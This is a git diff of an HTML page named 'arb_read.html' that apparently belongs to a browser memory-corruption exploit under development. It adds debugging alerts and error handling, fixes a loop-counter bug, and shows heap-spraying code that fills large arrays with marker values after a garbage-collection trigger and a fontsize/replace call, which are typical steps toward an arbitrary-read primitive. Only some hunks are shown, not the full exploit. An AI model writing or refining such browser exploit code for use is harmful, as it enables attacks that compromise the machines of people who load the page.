--- a/arb_read.html
+++ b/arb_read.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start with uint8 value:0xAA");
+alert("start with uint8 value:0xA1A");
 function gc() {
     try {
         var c = document.createElement("canvas");
@@ -45,21 +45,24 @@ var s1 = c.fontsize(1) ;
 x.replace(/\d/g, s1);
 c = '';
 alert("ok");
- var spray=0;
+
 if (1) {
+try{
     var s_size = 0x10000;
     var cnt = (s_size-0x14)/8;
-    spray = new Array(0x10/2);
+    alert(1)
+    var spray = new Array(0x10/2);
+    alert(2)
     for (var i=0; i<spray.length; i++) {
         spray[i] = new Array(cnt);
     }
     alert('ok2');
     for (var i=0; i<spray.length; i++) {
-        for (var j=0; j<cnt; i+=0x10) {
+        for (var j=0; j<cnt; j+=0x10) {
             spray[i][j] = 0x666;
         }
     }
-
+}catch(e){alert(e)}
 } else {
     var spray=new Uint8Array(0x10000000);
         for(var i=0;i<spray.length;i++){
